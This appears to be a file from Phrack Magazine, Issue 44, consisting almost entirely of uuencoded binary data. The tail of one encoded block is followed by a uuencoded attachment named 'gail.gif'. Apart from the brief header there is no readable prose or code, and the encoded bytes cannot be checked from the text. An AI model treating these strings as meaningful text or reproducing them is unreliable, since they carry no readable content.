HPL?I&]JJ._9$SM!$Y):J^]3LH ,64LFC'([ X:H]&=YF\2]ROJ=&5?@LY! MJL0,6>A"Y*6(Q#$79\(@)&:VOFZCU-&-+$Z1*B5:2,/7: EB%N,_;E 71RNA M=E [8LLSDBPDL,-PUDH@S\481VJ:H&X+'\@9&Y*$AH-$JI%)2NCGL,*+VN8R M2/ Y'((FPL=4V 4U,@5$&HZO9N(DN8BB5-)^\"D>HX8![.R:YJP$2&IE;IQOE=5JC<_)-B33N@_^: M#RD8#6:J1L08@CH #;4NZS<[Q@:I<>XRK]KH#TD2E$!GPZY>,3XRI9.<94(I M%)4LU F1I<8^KUUJII).C]?H397\S1*A""]*5%Q"@[VL[A@K*RQ_PS?_)%3H MZS-'TCP-#;38R(>B=)UZM),> $B#=(,230)'5"ED[.4\PTY.5&EN\M1>8TAE MAB6FU&?^\&2PIR9 Z6[ IF&BA!ZGDT#A\-"G<)Y*];_HTTP9E9T@"57_(\6&NH*1:"*9PA(SN DM MJ5 I(;) M4;@GNX^!5.5HE4K+/57A&44@U!17*S1A0H\ZQI5 MST4X559=&]6^EFS@\"UF36EF:79=W7+-Y')8.?4^V1)'S8M)M/:)7$W%"$6+ M+ F?O@?P^#124D-GJ.5X_Y)'1]U"[JTE)0'H:@D,:Q<-XDELF+QF9!NK(#J:'$Q:$7]*H'8F^& M=5O7=BD0-+&59G!*=D528&62@-,#?%G%S=D>1TH'# M94K-]%VMR8"$*,YR>'CY*46[U1Z!^+;:ZU"44\YPS&1^$%$,T1=?#GLF:P)0 M&(IK%U[-\QF=SHK_+8:')8WY@HO==6R-*3_?*Y2VJ6N>,W-IF*ZRJ72;M_TF M2CG%"1CUL57KF(GQ^(GUF*]H)F< .9Z$)8I168,8C4_/U$XT4- 8F5_N!Q=; M>8K;:,;LV(FS-Y1%>1G5R __>TLD:7=\;3EP5GE4 MR7?/FO(@\M=0 3$=>W M!K5E_P=;X=E>0\^*>I?D>KRN63FRUC#:)"J2"CC6?F[G< M5,FW $A&*!FF7RYQD]["N'&V8-TZ9 ?G#;K:$_8Z3(R"G=5JX6*HT4Q.G ':E^QB: M.8R !KIDE2VIEU1_.$)/A?-,_[R8?MLR80 WS39UGNK+A7UQJT^JJT'YJP&, MIR\:JMR*(1G6HQG:K*?9AZ5Z3D]*.\D:OZH8@ &[TKR: ML-LHK'N:IM&*HU&)L<.T1&A#Q%3QO6)5KLF492.W@6%#:^QXF*W8MXL0DGNM_XLI"6!=?RNDLRN^'[1+B[ MNS.:>4Q;O -[M\N[88./H@,H\"L=$L,VK M' ZO?%8K6\N[K:>YG+T-V[ 3N&KQBLS+W'4+]#M<.!A=Z0;/T\7)EUW=R)_C MW'C$C&PK^W4A7]$[&\@+D.7R.J(?9:(+W9F?F[:R4Z\5=\DE MQ=$O"M(I(G\]"F1$Q])#\\7KZB$+F$8OZH\W]84#?<75&S7_.WG,B3S5"]K' M#)O#M1.,T!;6=;= -\W^#@B!XH9 JGNNAQ1WRO;"\_G1:538#YN]_7JYQ=KE M.OF3BYO9&4?6SDBKE6S139Q=T=K:S^PE/K*1O>:;MKEG/QK<[[NHH0Z_9538 M?SJ\19V5@EL?F^#S3A& MGYO*2S+ESSI8ZQ*U8?[<7?ZT_0YP,8@N'++.*=1GE3[B@IR3.9M8*?YQ-_JQ MKVZQY)=4R;9PAPV;5OBST?W9%Q[(_WMPZO]F/&X7Z\]3ZY]LHQX6GG@;MY@G M,%&]J[9&T%)LSLT).[H0<\ JK^\C$_\S5_\SF_\SW_ M\T$_]$5_]$F_]$W_]%$_]55_]5F_]5W_]6$_]F5_]FF_]FW_]G$_]W5_]WF_ M]WW_]X$_^(5_^(F_^(W_^)$_^95_^9F_^5<_(^3B'YQ'^J-?(ZK_)Z[_-NC" M^N>"^KL?(\8#^KW__C&? M_-]?_[L__/E?_0$"@$"!_P;^*VB0($*%! <"./APX<&)!@M"5$BQXL*(&3=& M="AQH\B1#O\_5C19$N'%D"!%EGP),Z;,F31KVKR),Z?.G3Q[IB3YTN7%ART3 MGC0Z%*5*EBN7'O7($.11HE.I1O68-*E2EBFO5LWJ,ZS8L63+FCT;4ZM5J4A5 M%FWXM*K7K3^CFLPH]^W:E4'=ZD5I=ZC:O%G]HCV,.+'BQ3@'!V;+MRA6PVHC M"YX]?NG9%UXW+.+7JU:Q[.E;*]B/FR7@K4W8:^_)/S:4W M&\4X./CFSH";RK3=DGCKY"IRW.!CF_(72]7J)HQRQ4^TWQWK4=@@0;_'@<:3->- M=A^ GOUU77Y22?A8;Y#Y)YZ#:?%GWX$>?KA>=O6])YUX]Q6'%7S8,;74;7 MB6>>>N[)9Y]^_@EHH(%"N1N2/]+D)'CT]0CJ*I9+XZ*9KXL95;[$6J5V27W5HHW&W?LHJ7-_9 M6%Q\8,GJ4JT)FKC5K!3JAYNL,P)Y8J5O_\*Z:ZT!%HMBMLA=]J6R2'S#Y+ZU6XO@LME="Z6:FZF5V[8&4F2IAKL_-1BZ"P0!V[I'?% M_LK?<36&*BZRW $+L6$)F8048L\ \ M-UIEJ4V:&FJ]%:=Y\[HZU:8SQB<_39I^O(Z,KLBB.96T1K<&IW7+/I)=]M?5 M 9G=U6=FS:U-MIZX[W[VXHSQV/'%;+:BLD'(*]Z2M3.@YHI1(Q2OF2JZ7*-ZM2<1GH^]E/6+"B>]-]=?TWWYT_G_F7Z/RC^ M^0F 8R+@GPPHP 0J<($,;* #'PC!"$IP@A2LH 4OB,$,:G"#'.R@!S\(0DM= MCU2/@]3[^@._G*4*>]434HI$U2L0RM!7*B..3#UK!R>$3@\=!TR$-7$(,HN_,8;C^G\0_%5I>@G9"O?] 3GLS@.R5/0"V,<>[C&)T:Q9.F:FQ1E4T)6F8]^ M$&M;'KVXQP&!2T6*_"/,'%FYS7UO:8><82*32")^[1!D1T2=#7_(MTI^\)*Z M QH2C>BY]Q3,E+ !'"5%:<&BJ5!]$VK?J5)X2TS]3$IT9"'U7 7+8$Y+F,2$ M( *+B'^>BY M+!.N0H*E8B:%J$N+0/TD*T$'1IXY:*DB6U9/0^E#5Z+Q<<'ZJ"J7][>RY*>H.^5=A(1B MT5#^BZ>(TQQ4V54Z'V:Q9)YT(E8A]U0:L2VIAI1D4<SLELFQL+T-;O^:"Y80>T, M08ZF=]TB'X\*R$4R4K3Q^VSC!D<7O+)-D5XEHV"QRA.B"K:LMJ7A$)7:-5=2 M+*RL?2M3%Z791V;2J_]$A)W#E-5Z*50ZC^+.N5\E&>GF6MZK,*XPSM>KS?3DD#0*O/'*Q.@D.UT9&LF>9@- M7#*1GPSE*$MYRE2NLI6OC.4L:WG+7.[R_Z;63A*.EB(7DYR'ZC M:'BYU]&,6B2E>EVS A_FX*?:-:B':R1Y[6SD-E?X85B$FX7G.S G YI>@N9W M,U$+/=Y88:YNBUZ@\]YI/25I^HW/G7%V"UKI0(?/O@/S[6TQ_.D4*SK4KPKD MH*GXF?-2-M4O8G7^5IOGBKZRNN)MKZW[A&LW;Q*4D%ZP)('[ZSE=>H1B9O;\ ?F,U/Z*&8A'1,MK6OC>UL:WO;W.ZVM[\-[G #(" .UZP end ==Phrack Magazine== Volume Four, Issue Forty-Four, File 25 of 27 **************************************************************************** begin 777 gail.gif M1TE&.#=A0 '7 /< 50 J@ _P D D50 DJ@ D_P!) !)50!) MJ@!)_P!M !M50!MJ@!M_P"2 "250"2J@"2_P"V "V50"VJ@"V_P#; #; M50#;J@#;_P#_ #_50#_J@#__R0 "0 520 JB0 _R0D "0D520DJB0D_R1) M "1)521)JB1)_R1M "1M521MJB1M_R22 "225222JB22_R2V "2V522VJB2V M_R3; "3;523;JB3;_R3_ "3_523_JB3__TD $D 54D JDD _TDD $DD54DD MJDDD_TE) $E)54E)JDE)_TEM $EM54EMJDEM_TF2 $F254F2JDF2_TFV $FV M54FVJDFV_TG; $G;54G;JDG;_TG_ $G_54G_JDG__VT &T 56T JFT _VTD M &TD56TDJFTD_VU) &U)56U)JFU)_VUM &UM56UMJFUM_VV2 &V256V2JFV2 M_VVV &VV56VVJFVV_VW; &W;56W;JFW;_VW_ &W_56W_JFW__Y( )( 59( MJI( _Y(D )(D59(DJI(D_Y)) )))59))JI))_Y)M ))M59)MJI)M_Y*2 )*2 M59*2JI*2_Y*V )*V59*VJI*V_Y+; )+;59+;JI+;_Y+_ )+_59+_JI+__[8 M +8 5;8 JK8 _[8D +8D5;8DJK8D_[9) +9)5;9)JK9)_[9M +9M5;9MJK9M M_[:2 +:25;:2JK:2_[:V +:V5;:VJK:V_[;; +;;5;;;JK;;_[;_ +;_5;;_ MJK;__]L -L 5=L JML _]LD -LD5=LDJMLD_]M) -M)5=M)JMM)_]MM -MM M5=MMJMMM_]N2 -N25=N2JMN2_]NV -NV5=NVJMNV_]O; -O;5=O;JMO;_]O_ M -O_5=O_JMO___\ /\ 5?\ JO\ __\D /\D5?\DJO\D__]) /])5?])JO]) M__]M /]M5?]MJO]M__^2 /^25?^2JO^2__^V /^V5?^VJO^V___; /_;5?_; MJO_;____ /__5?__JO___RP 0 '7 (_P MQ;)E25(M295D63IH*Y(M M6Y4>/EQH:2)$BK(J28JT,5*;.&U"BAPILE$;CQY)EOS8*$[+D"99@DQYLB;* MFB]KMFEI\F;/-I)VSG3DLHV;FQX;18JS5.G22%!/0HTCJ25*CE@C.8*JM&/5 MCI&Z0NWH%&I6KU@W5N(8"ZK&2&LCQ:K4-I;!2+7&FDW+%BY?A!L;2HHE4&-( M6];^_=OF;YNW?8O_^?NVSYMB;8K]98:<^=L_R]\F__L6^MNVT:B_@?;,>O3I M;Y8JQ;X($7"MBK4(VKI=2]?#W+EW-Y15*Z,LCCQ=!N7Y,23(E3!!OJ09TB/( MHC%-OGQ^7>E.[3C#^__K%E"4?^1;+/-_IP^-@_&S8& M(F6F*4;BAI^AJ%IEI'W6FFJCF<8:B:F9^(]NLM&FD4: Q5:1;KE9XEM$/U8D MBT&2"(85=R>Y45-[1A7%I',JQ72=4,UI)]U.0H''')?955544NTE1]1/5]5G MTT;NN00??%)]%5966NU5(9T XLD75!=&4K3NUMU8A2_*'$5"3P(?=4@505NA1:>MJI5Z!@7;@@5HNV M&]=9 3YH8%1M-#K:/MJ<5MF&D5(V\,*4B0AB9"=RNJ%GKZDX<:>CB>:99;$2 M%"N124IRH4 D$Q11<+[I1A!O#^%:(%3&AG6MN=,Y]RQ(QC9R5$QAP1364<%& M:Q1U.2GUK+ L=7ME2G)PV=]-YDE%G[K^>:?NG$JUN]6<4SW]\LM_A5WH77D& MNNB["?)9(=C]M?$09OI@K!EFFC$&HC<=0KS/:15[_\.WB)ZAR+=GJ+V6*6E\ MITBBGSY2)&MN)XM<4&P&260Y<(Z[2MQ"2 9HTWM6G\033^RU1)2X.U_K'7,_ MU;15N#?;:_>[Y];EL MNZ4H\Y+,I.%DC7*XV.$AGH8:PH^U!C'$HCD6(N&DA:BW9">RML^LNOT8G*JO M"L;CR*<&J;)P)U?DYUML*U.X@$7 -IR.*DIK"E.BA:[R<&LY.G'=1XC2!MS] M2G3<2AJX0%XI-U%0LD%R+@C/A5AS/1!4$/DTF M[$D:E)96P914CR5RD!(%;Z(M;P7(:EBQRGQD2,.];(V ;7*7?E;XM7EEA4!Q MJ9?T"A621EE&&WXK&&821\K(#.XUZ3LB:YCH*!IMPXAY(Q'@.E2Q;S10$ALI MB$1D@458P4HA@-G1JY+4L=V$$2(9F1"@FN(J,8Q(PXT8&5YC(*DV@I M240BOW5J(_"9G)^2],53Q<]CLIE<041VFX\11!=!.M4OZX=+"%GP(TUKCS4K M&,?KZ+1Z;E(3NLP9Q^2\ASVWVXYWV+F5>9IN@3V)*DBJYYUNGHN>-)Q:UJI' MP_] ;UV$ NG8VI7/__Q3+P_*2DM 2)-(Y4-,2UR4AR]K(N\Z5A%= $_BARD?Z[JFM+B:!V4 MI)%;/FE/4!#X+J?.FDAF\!2QZ>4-BUG]9,_T_:RH^A"&WX-C?DL$S[%U/*Z+W)EC$;C#4AY M!C,(LZYGG B9T]#2NB(2F6$/^[4+K>Q'%CFF2"4G.53![U0YB;5X6Y;XK%WS6,5#G,NZ$,KE<-N5&8)_LU*, *RGNA<:'1'3-:(JX5]1PJKL= M"C)@'^I$OLGU&^K=D6&Y.%)=^C)^E&V<;&3SO]D(9R(ILZ]^36J6)W56)@L, M\ #) V&M@+.-Z[$M2K@).G6&< L5%UL\-S2BQ)C=$C?*(Y<78^6=JQ$/]JAM])!&#_6A M=4<3-X,]<63JG:]R+Y32+QKSI+ZD[TI?1>N.:6(BO$&(R0KSS@';62CQ!/"P MF,).H]9'M&5RYK$9N$8Q60O .+V.>;(UX7%B:#X*;+ XX,2TKEG0,!37IV: M:EP[M0LL.U)NJAJE#5;N>!N5@;?"+DVIOOF58) )[ZCEO;?%C%)$CJ'KB"Z- ML/U>%B$*24N2)0=?E?G25#ZB,JUS5 G?Z.+641Z90VB=U6[%C)M>YJP:]7S M G>EPO+_!.H?@44?JK9K@=&4K7^GLJL&MC'FM*5/;)O#U06W"SY'+98+"2CN M1%9R>4N"5R[-PJ%MN!7>,=J07O7:F!)]PU%%MCK635-+RS"F1+4TI8SFVJ'# MYW0HY&].A>.KC5!&,[D5T'<%K=NG!B-R28/.ABW,J$C'9,3Y@9+ M,X?/?.W?PX7;H#1M);"]IC:?1-3M$/*_\P&M (W-P:P5T+#T:;"*D^XNM,#' MT1L29< SY3>^/?0U%C5-=S^C8ZN[IGU7=]'71QG7AL8-1 :3,OQTL^J:&K:+ M*3VF;S3Q9%]2CM:P_E/]7M72;3TGMU/#YKFDIF;M-Z5 HLLI_S:QJGBBR/ H M?T13M:]4G\NS']K8;\YY8.(MQAOU6M,VUWP:S-4Z)IY"=H8N8),$2= $:>!: MDW-%$J$+V\" KU0PLF=$$BA[I%&!6X<98P=V.A8WFL$9FY8^NZ -7C0KTQ=9 MNX9+""$'EB '7'1WOM%P>5=K"0A]>2S05V<(3]'02 M]&05_==_#3:$TX1;$X941J$TB:<33S%(UX%]2[B$HN=]>G1_. D#'69@')[]B.OI7 M3=/"BM%B'E,32/Y1'SY7:(O4&2U1A6$TC!VZP7B"E7C\G@';X MC"B(6([WA$G0!G+8!M]8@&G0!$YR6(Z@@NJ%=@X7??LE4J@V?9/5<%DV3*DF M1G;71218B99P+E,3-?&A?786:(/&5;\E6@J455-S26"5?T*H;)ZE0+$%%4"C M'OHG>O2$6$%87 NY?? $)RM'?D-'*(U4DOS"-E\C10K'$7;($;ADAR@H1=#( MDH>%+H%TDQ__.4\I-T\XF2 I95_[(XF4J'$)F%\DU7"]1#D_&1$9)U(GE6LL M5#Q/,3-<01;T%&980T /EAZNM1%;$XQZP5K$9A;B9EAB@1SCHDYD22"^XG)3 M&1\<.4EG:"=ET4CPHA=]TB=>H1&Y,CTXM$6#<71A1:9U!9X*1=Z.9C(%9,N:9@O5EN,(J9PI01E"@K%G<1$V=W"$&4*_,; MQ/7YY9T7]6*U#DYA!$<2 DKNO] )$22%G:P:OL#.9FUB?,3613' M6!'ACZS92%WIGXC6I,@97/ "(0-BEU,182+!!N#8!-_XAB+!/&EZ0RLD+WTB M(7O1H6,Q4&>%)&MQJUC1$ W!('9Z65#1(%,$*&N1$;@RHLKU6-69-F;QJQ0J MFP$%/76Z="+C3Y*C$(S5GM\J@\\JK/)UF6X7&Y+8J*ZB$<#!6/_(J2A6G&8( MJK[E%4SZ+PQ9'XH4$JR:!$R0!&Q0@$F !$@PL$B0!DC0!*RZ1GL"'W5P3S04 MJ:.G%B>IH732)WR:$'BA7,FD-@Z!*[Q:IQ_+KKET+[E"1AR1%],S1<^J9,=* MG9OT%_Z8GJT2,E3_M$60V46I4G'EB8EHEV2T%AQY=Q$2IQ$JDW$MJ!MP5PM4 MID]C8:5JP11K$0=36SV5 !\2BT\Q)*M30B6#-K A4;#_^J\%VP1HX*I,((XB M :L#":8-U"==J9YNP6CTDA4N^Z=O 9GW\K$@VSD:=UD+(IJ$,1<9,;CNA179 MJF1OD:T6J'>^A!#FX / M.V7#!W%5]A"2"+%NBZ9HXUH.2R]4<;5O^B]O01(!&[#^^JK\*K8#FP9D.[ $ MB 3B*+P#:[:P^H90ZZ3[ E#.^:?2.K>:]*Q^D2B/FQ (ER")0A<7(IK-_[IJ MQ>JK"Y)9PJI<=FJJTXNK!>*GTNM/!$*U;[IWL*)8PX05D9J/"OB"I+N(%]%V MQY1WM6"'LQ9&+X@_BU@);Q&_^G%BZ))6U(N'UBL]?R)%.=&[X-B[*5"P95N M 8L$:1N\WYBPQ%NP"%N\8'NVHZ@7R)IN[2LOQ\JN?VF]")(7W$JX.](6(:H@ MA6&C'XM,R[HCQD&RK%(8!H(@1"E,"=(Y+ML@D(E#7QH8&U=9'L,X]MMD>J=? M+Y6(#[QQ*5,D/(JZL)(;MY92?B)35'%R5+17D[$'[QIGWA+]'YQ.^+;F9# M.6B\$">%NI;8N7 Q<3\*4P\A<>A)3!5Q:[?V$'=[&X9[&X5+,H1A' 4A MFJA\GVXZLCD[[NQ:X4 MD:BU L2HXA"G(ID*04:[,46)2E)O'4RNHDQO01B;')E;9+WM6TD1][^_W+,D MN*UC37>5^45FE+='ZV@FLW3NY=B4U9D]NH@ ?;MG@2!_JG1\F;T7K1(%:\[; M[,U#7<[>[,TEO,$E0 3@O,T;'-4'*XX!*XYT#*OR3,BLBE:#X=5\'1NK@IXV M"M=N348D$UDLTS^4FMS&=-S+;4QG/!A 7+Y2;$68G+X3(RPHW*G]R9<=W)#C&X<(W^;/BMIP_PA$<[7HRKT;B E&: MI7FSY2L8)#/1RV7$NOHO^MPC'[NA\3@YO70;%#=,S"P_6;2M!1(K)B4D4\:" MD AW'N/0<0>5THNOF W8?!T5:'OA38#:'&S4$<[43QW.I,W@JUW.W5P$=DR\ MQTN ?WS(X B.UJ,60VQ,ADN?HLGBCC.93MZNAE[?0/]ZJ4 *I+XLXXO^H[5F M@A)7Q,]-95266?O\MW+ZLBWC9#Q2G8TE7W<]UHQ*GE06J2#M(XVJ"9O8LF,D MB9%3S3+%:GV*HLYYW=8[G=,$MH'&TM;)(0.Q(?=UA+]XVESN"B+3,A$J(;%$:+N<+-BV/!)$'E'%:?K)W70 MV)D T$?NV(XMQH\#F9O>IU".0\=,Y)9PU;(MU01;P@3+X 2[$VS0!-%^L$Q0 ML()KN@HT^Z+[LNY8 TIP^X2 MD>[MGC+E+M\209D["Q&L(IE$BQ!/WQ#^HL (H1&\=.,"P2[K43WG&NKU&!LO MY+.Z$:F2\+!U,-9X-^64D[^;^,74C2J]844&G>DMVT63N]NKAO('VP0DG+ ] M_>MF"Q( F[P+:[9W7+RJW>!&30!(X,=[#.P(GL>'S+QTPC*.-IF.G?2V@.7" M@>6(7@M_:#FC+^Y%;PV.EAO9L(!SS[J?[XLT3D6G4DAP=)M_.[ESXB#RPYLS4>;S:*^_4$7[(S(X" MD#^P,\$35]3MXIX; %%-5RU;MFKI*HCPH#6"MA1JLP715BYK"+75@I@M84.$ M R42S)60H<&$!0LV)-BPTDF#EE2V)!C)ULJ9LERNK"0I)TZ=MBRUM"4IDJ5( M;>0TBB,I:21)EII*FOESY4^73G/*M"3UIZZ53W7JI-I04\&L0NW(I%DU:-"A M/MU&'1K7TE6B=655JHLWKM X;=HD0>(7<)/ ;-H8;H,$29HT?MLT$NP8"> D M*(BD((*$1)+-2$IH1D%"].: FT@YA[R$KB0OK5,HHH:B9(DD.5%2"Z]: M?DH)/9]JZ>FJ[\ K3Z@VE$*JP*'_"ORI*:R@\FE"L]IJCRP-ZT+0EK%,:JI# MK-XBZU"?$*I$O$CN,I"IN-:3:ZCTTD/1+\N:<#$-Q!8C 0G(_ K,,1,GJY6U M(E H D@D@]T,V!J))')' D0CX,<=B[21B20(:Z,)-IH@:3B!?+-&2X<.BJBC MA9;#2)>.J /N7#&UE.A<,LD4ESF"KBQ(HV]/@BBE2L0E*<\[_ZUJ5=O:NX\I MHQI1RA&F[BM(DO1D,=0JIYSR#]&L G3KPJ1RDL,ILG:["M'L]O7))KQ +K74 MN6212^!84.6KVA%1<(R)OZJ]#(TFXT"B2D=GF25A66=S]+'Z) -KLHF^+.JR M[.*6^S)NML.W,ERVY;;;(5UV>=MMNNG6^V[FTH8H[_/Y%9LEPD.JRK>5[B2) M=RK1D$KYQ$/SD4\"[?"4J4Q,*)A3E%,6!I:+(4@MIGK/YO8SD__*;4I",QE* MA$Z&P5JDJBZQ6(E,(I$36>A*29.IEF"&-Q@6P0@%1:%/S_XRFFB-AM;LW18MNN MZ#XQ=D1M'1E.+I2C$#-]*VS@2@E"Y!0EW^1I3U'!T^%J(8?&P8<^!@(@>K1" M%#Z>2E'OZ4E!TM*HG"0E0S09RU@F]$A)!/(@_R'/2:IR(17>A52"; M]H$[:2 M\"U2@C,<3>YDP3T5*"E&Z>-7YC*AJ>RE*3;QT.E8QO:4H85% M"B\V09 =5M#)*'YE$1(O2A&8VMYG-G-YTI^;:AC6%RK9OBL\A M[[*IEI:SMH7(L8ZXB11RU+(@138*F7%PA'UV4A:72"XNIPJ54S)H(((UC"@+ MW!C&+%&;"PE%/!^SBDT(**J@,-23=WK9J#S4%Z3LC@2).4QC; :C:E7F,GYI M F50DU)>D>!H_X]UK"QWJ=@7*@FD2EHBU*+WHP(\ZT>5H59\5KA6;6*3FM+4 M*1BW<=K21C.HV?0&:[$Y5##&SWM8#,ETM(0F+&YD;_TB":-L(@N#%(A "91$ MQV17.D1Z[)"4DTL%,3;6INQ)%Q$B2CXKE5")L>2A,;%%+" :'MC9HD22(8S0 M!,.$-!"FE*BI%:ZFQ4/%VH@RQ:+L[F"4A/W":FMIV-KP;IG$9Y$@!#M*S602 MRQ2=7/.95]2I-E:KC6_\-)L5AN9K6[O3U%XQ?0^&II9JFUMPL3$WR*&.;^YE M$#X!*B@9B@,?^3C/IECE*^[<4"(=N&/)!=* =9EH3PK80)6I>')"D?\33QZ: MPO$2-Q9^X:,,4RE3]G9M=SLL39/XR\.5^JHS)L7O2BO;HB:YL V?L8P2"4Q@ M)0)&M)*X*6UI.[Y=1+/./'6M-F.K"V^L=K70],:#X^QA^$4SB[8(4_HN$AR$ M"*Q8;PT!F M5L/[S(^(I40B"C$TP.H+44JK8;9MH\]YEG"$8ZN-<6O#%^/S=KC9MN<)MYO< M$)ZS4,%):&^N35Q7JN*BZU62FMH$*(\8-> M0O$/ "4-.X@-)3L'RN14.K2>%LLD/'P4"E($LYB>W8Z]O2;L?B=CL_PF[5?! M.BEJ8CI#:DV+#;+2E5\@X]_)@+F)S5.SCOPB7G3C&<^ZJ#"%E>[G<#-=PN5> M]VKK'%NHZWG#@]8FN^*&-C=!Y#FZ"(F^!8>;0Q*$N 4;:T[N=,\)R6>B;H@# MW)]"J=#I!'/TC I/&FF@] "0((EBT%JR$RC!S>1.*I1U5RNYU_<()KVW6ZG* M9[@8]XY(V89% =)FB1E?3RL-T@+PSOM:;6RY>N-.+M7"5&"9*; M D"9:$B>TY]G>@PE"2>!G).>\YQ>!"G=C+U'[7$JB/8#;A*:Y.<[JA5AP0P= M$0H;A JVT[1ULD2CB \WB (@] ^)F:2 .YG_BK2J(CR5TZ&*#-JGK+B3 M"YF*BH2*MN )'&H<-\ A*2L-',&:;YP18$P,SC 6(=*,ETM#9,RY-\RY:LQ) M-EQ#QF@#Y!' QX$SGWJW/M2&7V@ZW%LMI!3$I%O'=?0&J-2]=P/$/+.]]]&& M.E/*XVL.]HDWH;(BK/6TZSFVBK8IHF]S2#4<#E_=@ M&0FB%$UK%)N0G*>8*#GP0;AS@^1JD+[TG%#+"N\PG""K''^+D @*(3H)E3]I M"4_J'Y?XG;L$6T3:9[ MQS]\IN(D/C$:'_41"."X"+:1#NC B( K$.T;*U*!'<1Y#Q^,NRB@CQC+' JJ M"DNPCXV9D #!N*6XF$5R2[F8KO9\BW^1*UO )Z% 2'%2E M^P<)TX=T_+8+%,ZIW$!ON#VH$\'C:RTQ\085Q$$LHM0I1$D4Y^$&XJX]41#B> $*]<(O%[,&"8B>"RH^P$"0N_9BI^"Z=V"O$ M)X".Q88B@V="8R2"J8Q58QL5%"/TDEK=(R?U!6<,PP/Z1:+($'EO+V@ M"K0,E,?9W(=PZT/=E$H*I3D6Y$FEKFFOQFC6(7K6[+G6QR@*%7E99#1-.1RWX[L]J-1 $+L;>),. M^0&.(&L+J! E[6F$3OP.M2@8#Q%%HVB"^5#5 JF$L^@8.\F*'KP0C[R@)-R0 M[7JQ!)(#@JD+5FL4C!.*E*P69/20 M,,DE(2;NR_JAE3(D@LP/(+F[E&R.@+ MQ) 5_AH1H$Q6:\Q,FK46V8@%;>+ :X)4%%54IA3$H]U9WM2&0T7*UN6S7>BS MYJBP14PWV:4]>9PPV\VIUW7M3:E48 EV1V_C,WA--Z64VJ2KL]6D=!2T2J%:J#F%'N M4YBUD 2$B:$F6)@G+4R"XB/OW,[^($6Y[:> TR#UL#&'E<@EU 2[,#5\H<0G&,$;MU@IN-X3-?=C&9U4]2L1#[E MI+>[68X_0J0]@HW8:(*LVN$*2I0Z:%X?9,@98Z[OW5M47$).N0J0FV&'FR"P M?=LG+9F\NXM7LIF:C03#"(P=(99:R;RDH6+((P$0:&@I/A;_.#5 R-45%N$O M]M7BRC39+2NEC9*IQF@2)&#=\4%F-%ZM @[$.E9I"$[7"/X&JIM*2/4V?U!@ MH95*.-9 W(4P/]T]JATC%C274,RGZBMD&4KD%AX9H&-I" M7JY6TZS#RI*6%WH>-P,PGWR1+ :P<@TW2@TWV(5=/';@VVS@:/Z&W%S:/DQF M/&9F=XO'YM@&#*OLVS1@MOF&Y@#4/Z-*R,SA4;ABB[P0H1HK M3UO@(R/]G4.^QL"E%P*/93)+EC$[84^(Q=,CUEK,S2*! 1/5VD?.9@9O5OZ+T*]H983]1"C>_X#L28 M]H9_.+X8\XDF/:0Z< AX#"OJK>&Z,%6IF+&%\XE2\PG,N;M!NA 2H_? 5S'<;,6H2Q;OAI: M"J+H]@Q@2;/6&(S,/-S)^PS-\ L2U()>TC)QV86%2*=(\031B0 MA5TKA"/,JWA,7$D,Q"!HOW*:D.H5,[41,SV:%-BUQ_T\_TN]Y@:,W2C69BR" M[M:OW:$>)6'L/[LBW51*EAXW_J[FQJYR^OY-1TVLQ$KM!F_P:2%\[6F#W?N& MW=S-8.[6T^VV>F1$$-8%)R%AAE(*).Z:N,L)&TP4 Y&#I<=V; ?TXF9MBY,D M#@(R7!2/:J=M]8#2S %)VY#5.FF<,.69_VH1PVKE%58J&B0QT_8]&JA):^2F M/)\\/32HP[ 7'K\0#5YQ:+5&@D>OZP'\+"2(FW!Y:6*7X!(L5^\/Q K#\F5^ MQT.]]7_X!K?0!12@'DY[(;&7E@$=#&IQBM'6D)N?3AH,!"#F- MY,BR%,E2FSA-DK1IXR:.)$N6:EFR9?&@)$F1)#ELTK")G(V50GH,*=%2)5T2 M*VEL64FB14FU;$F4M7&CI8(S84IBR;(B3)0345JTI2OA1R0-D[!ITP@)DR1( MD)1 0@))"A)$M)8@0J0JB11>Q29)@42JQS9I&K)MBT8JW"1PS\HM0H $B2)? MB121FR8J$;E(MO]J32$7;YQ&%G59^Z;-\;;'VKQM<_Q-GV5MDB4[_J?-\V7( MVK9MHZPY2=J[4LVB: TU"0JLLC\RC&-1FZYM^S1''JV9M^_?CH'_WI;[-W)M MUAH]=",)8D9;&MO&:6,R(DU+7$D9,08J6BMEX>C#2R_7J: MMFK)\MDRDL6)NN)GK*23YDP]5634?6VD%4ZC.;-9)(!>=ECF/FSC3^2>5;D/]_\XXU%*2Z$%PD$2$CEA&'AE17_"0LU M%%5U&ADE)(_Z] :D9L,%1UQRO_FH39B)A=132PU5YQ!$.='47D@AE5<=0QZA MUU-"#XD9GT7=?$!Q9Y!0\B4*:7H54<12HHD^UTA;T[&E%%X-4H5"$51> M:>&59Y%0HF!M*+56&R V F*L'+(A555B944572S"E483;PE60D,2-I'&<]]\ MXT8; 1!@R25!1J8+94-.QF-IUU:[SY'>[.,MFI/!!@ 6E9YKH17;KENA2U^9D^E1;FMB<8<:9/Q7=1>Y=)!1 9=MMDR!AV^U2V$1441V(5)I! M_A9ND$ *ODN0/NX"N+^1-*SX33U%$DEB<01LTDHM070Y1U*@YE''#A<:1QSU M 9C=Q 5'M!]0>RJ0Y5VG$I#"75D5(->[L/*N=S&A#;KPD6.L=2_D M[$LSA-N,-A[8&XUL9%XBHTE&)'>Y/,6$)1"I8$3 PY V/.5G)_6)"$5:EI/T&$47M[L=TIKREQ1UI2M:*A7P]B*\KN2. M"&H)T:QDUA!8'4LJPIM>7(1UEF.U84--Z$M#2-4Q#)JG#20 @%S\]8WP[<@; MIDE@:>*H)--XXQO524$*R'6NMP'@;26XBQ_;5@"=:8E+:)$+$\R2A'@U07%N M%-*_?E2OOOG-7_[R&N3HQ+@9BF138I_%R/!UMKA<)$H2B0_-12IX(17-4C0WW=F,*JN2 M2AI>-46VH*$AU92BAJ WEX8$C0G1'"$W5]-%W$3&*5T\HX'ZE:W@4*9;<:SC M8TK3)(NDX(_ELA(^K50E^?VQ2OWTI]P&B0*S^ HU[GI7&WS3(]P(;IUK9*C7 M&*H9:OD+2*^LA'L*MA[+/60[6%9E4IT54*LY4,$>$L3QR:.9^J MEJ;0XU(.G48E$_F0D/V:-)2,EB/K*$[&)\(I$< MGF>8C8S#(@WD/%[A9;=P^&+%0.2RB''"^\;-6*8TWTI?921#&F^D2(_IFIL_44" ^?ZQ M!/>$;X[VB(*WG0@V*6C7?U'#6>30<9T&]I'@W@0VD12DDP[NR4,N)P>*?9"D M$>%. 9& T(VEI0T;H4B =O_BDI?"<#ZJPTA\@&*P2DTJ=I "777B]3@6N0HN ML2G![JXBO,!$+S 